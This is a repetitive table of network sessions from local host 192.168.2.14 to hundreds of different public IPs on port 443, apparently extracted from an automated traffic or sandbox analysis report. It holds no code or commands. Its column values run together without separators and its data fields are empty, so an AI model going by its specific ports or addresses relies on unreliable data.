                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19251192.168.2.1438466100.140.92.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19252192.168.2.144078098.58.232.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19253192.168.2.1452104154.255.93.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19254192.168.2.143845853.84.33.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19255192.168.2.1438340163.16.246.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19256192.168.2.145582281.20.213.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19257192.168.2.1452594189.177.105.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19258192.168.2.1444194218.28.189.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19259192.168.2.1460514129.61.137.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19260192.168.2.1457704160.46.16.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19261192.168.2.1433538181.56.208.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19262192.168.2.145131269.47.228.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19263192.168.2.1439398118.254.194.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19264192.168.2.145346214.238.48.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19265192.168.2.143278812.61.78.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19266192.168.2.145098476.14.5.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19267192.168.2.1435428168.39.19.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19268192.168.2.1452962162.187.233.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19269192.168.2.144092836.172.119.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19270192.168.2.1435962125.87.28.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19271192.168.2.1439388108.207.50.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19272192.168.2.1460430122.172.102.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19273192.168.2.1448872221.26.100.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19274192.168.2.1436274181.231.230.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19275192.168.2.1437812119.51.3.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19276192.168.2.144571276.91.15.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19277192.168.2.145050448.89.212.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19278192.168.2.1458994175.123.51.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19279192.168.2.1445558153.138.61.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19280192.168.2.143614096.243.29.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19281192.168.2.145715063.148.26.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19282192.168.2.1436618100.22.234.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19283192.168.2.144347648.212.153.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19284192.168.2.1439968132.66.33.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19285192.168.2.145409697.161.114.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19286192.168.2.1453904108.212.21.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19287192.168.2.1453144212.214.27.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19288192.168.2.14562185.178.172.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19289192.168.2.145762241.230.151.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19290192.168.2.1457260154.181.64.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19291192.168.2.1436552197.181.12.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19292192.168.2.1444702198.86.127.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19293192.168.2.145893632.53.246.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19294192.168.2.1437804223.15.26.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19295192.168.2.1433030134.75.107.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19296192.168.2.14486802.129.185.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19297192.168.2.1450638175.89.184.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19298192.168.2.144016085.205.41.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19299192.168.2.1460096137.7.22.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19300192.168.2.1438266133.195.120.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19301192.168.2.1446438209.68.26.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19302192.168.2.1445600160.17.42.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19303192.168.2.1460124128.204.27.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19304192.168.2.144142236.102.33.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19305192.168.2.145189820.127.28.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19306192.168.2.1454910149.234.167.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19307192.168.2.1437326134.252.9.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19308192.168.2.1459462175.160.203.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19309192.168.2.143657676.79.183.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19310192.168.2.1459664180.174.121.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19311192.168.2.1443736101.94.136.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19312192.168.2.145755866.19.245.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19313192.168.2.144965063.118.220.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19314192.168.2.1459228111.152.196.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19315192.168.2.1452032182.117.6.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19316192.168.2.1446764124.25.202.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19317192.168.2.145247064.82.253.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19318192.168.2.1456884138.22.178.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19319192.168.2.14399605.255.113.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19320192.168.2.1434156200.218.57.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19321192.168.2.1441264186.52.78.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19322192.168.2.14527525.59.68.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19323192.168.2.1435542178.129.252.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19324192.168.2.1435522176.222.222.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19325192.168.2.143554075.131.31.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19326192.168.2.145435223.87.129.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19327192.168.2.1460660221.198.43.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19328192.168.2.1440712211.90.28.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19329192.168.2.143529832.30.165.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19330192.168.2.145321642.54.63.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19331192.168.2.144125297.218.151.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19332192.168.2.1457746143.79.72.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19333192.168.2.1435106122.152.53.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19334192.168.2.145035427.121.99.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19335192.168.2.14591268.3.118.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19336192.168.2.1450640133.152.185.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19337192.168.2.1447794207.197.214.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19338192.168.2.144148472.250.209.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19339192.168.2.1433094161.247.229.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19340192.168.2.143602675.147.86.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19341192.168.2.1437318143.181.135.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19342192.168.2.144065867.12.230.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19343192.168.2.1450062161.65.213.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19344192.168.2.143428068.186.98.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19345192.168.2.145477838.67.4.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19346192.168.2.1440026125.157.150.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19347192.168.2.145409824.61.199.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19348192.168.2.145368431.243.192.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19349192.168.2.144731040.71.223.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19350192.168.2.1450246102.44.14.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19351192.168.2.146041627.174.168.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19352192.168.2.144492268.223.80.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19353192.168.2.1455526152.13.226.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19354192.168.2.1439698140.234.196.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19355192.168.2.1447560151.110.35.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19356192.168.2.1447496183.35.191.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19357192.168.2.143908819.224.176.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19358192.168.2.1434392169.45.13.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19359192.168.2.145545874.88.128.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19360192.168.2.145469075.231.137.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19361192.168.2.145756279.157.89.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19362192.168.2.145051040.255.64.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19363192.168.2.144639640.66.44.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19364192.168.2.144240886.156.124.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19365192.168.2.1458380223.245.90.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19366192.168.2.1459928198.108.172.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19367192.168.2.1438192115.15.254.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19368192.168.2.1451356161.103.89.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19369192.168.2.1432836177.47.145.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19370192.168.2.143331669.157.228.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19371192.168.2.1446950173.201.0.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19372192.168.2.1440728211.151.142.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19373192.168.2.1446660190.149.7.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19374192.168.2.1434122129.78.248.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19375192.168.2.145471695.72.250.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19376192.168.2.1460052216.96.212.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19377192.168.2.143803678.147.193.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19378192.168.2.1456296118.147.69.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19379192.168.2.143642280.86.2.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19380192.168.2.1460978128.254.86.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19381192.168.2.1447252195.200.5.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19382192.168.2.1443082136.229.171.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19383192.168.2.1446574182.99.134.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19384192.168.2.1445800144.243.241.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19385192.168.2.1444252110.69.173.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19386192.168.2.1447360222.242.7.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19387192.168.2.145968876.126.11.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19388192.168.2.1440434129.129.133.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19389192.168.2.145783434.109.113.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19390192.168.2.145127823.204.21.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19391192.168.2.1455580204.158.19.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19392192.168.2.143931488.147.65.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19393192.168.2.145570243.0.35.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19394192.168.2.144995084.117.233.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19395192.168.2.1436592129.108.124.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19396192.168.2.145117884.171.189.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19397192.168.2.14601405.216.31.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19398192.168.2.143548423.140.163.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19399192.168.2.1458598172.189.175.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19400192.168.2.143601844.144.172.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19401192.168.2.145259057.255.125.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19402192.168.2.145141042.63.113.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19403192.168.2.143367695.64.73.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19404192.168.2.1446610149.237.28.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19405192.168.2.1436636202.209.139.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19406192.168.2.1440416178.224.163.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19407192.168.2.145105646.5.134.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19408192.168.2.1437162143.168.38.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19409192.168.2.1452596146.118.236.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19410192.168.2.145284838.98.216.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19411192.168.2.1445656179.236.173.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19412192.168.2.1445346119.175.103.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19413192.168.2.1450614169.223.129.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19414192.168.2.145670831.87.216.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19415192.168.2.1452676212.199.202.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19416192.168.2.1448362178.163.160.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19417192.168.2.143438827.179.15.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19418192.168.2.143439449.147.232.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19419192.168.2.1434972193.39.30.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19420192.168.2.146087420.171.10.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19421192.168.2.1440012193.231.156.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19422192.168.2.144279019.150.208.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19423192.168.2.144631690.26.90.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19424192.168.2.144782686.77.154.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19425192.168.2.145300886.116.59.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19426192.168.2.145998675.237.117.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19427192.168.2.1433078156.45.176.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19428192.168.2.1433570131.198.176.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19429192.168.2.1460594101.193.228.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19430192.168.2.144824424.88.132.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19431192.168.2.144948291.9.129.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19432192.168.2.1444552178.36.60.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19433192.168.2.145224458.61.134.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19434192.168.2.1446636217.150.114.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19435192.168.2.1445682145.15.202.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19436192.168.2.1434390110.22.207.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19437192.168.2.1449580180.33.159.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19438192.168.2.1446806139.173.226.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19439192.168.2.1452804191.32.63.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19440192.168.2.145328269.176.245.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19441192.168.2.1442532170.168.9.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19442192.168.2.1437776167.63.26.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19443192.168.2.1446582195.25.243.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19444192.168.2.144379260.164.200.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19445192.168.2.1453620189.228.131.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19446192.168.2.1452950197.73.168.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19447192.168.2.1450454111.84.44.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19448192.168.2.146042083.234.193.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19449192.168.2.1438462130.156.221.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19450192.168.2.1440060156.152.106.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19451192.168.2.143661474.255.130.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19452192.168.2.1456768152.222.214.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19453192.168.2.143312872.97.105.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19454192.168.2.144430440.210.105.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19455192.168.2.1458332164.122.138.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19456192.168.2.1440550122.58.151.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19457192.168.2.144325490.253.95.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19458192.168.2.144076694.146.175.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19459192.168.2.1457424109.237.204.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19460192.168.2.1439218153.175.139.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19461192.168.2.144975841.51.31.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19462192.168.2.1437152204.3.138.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
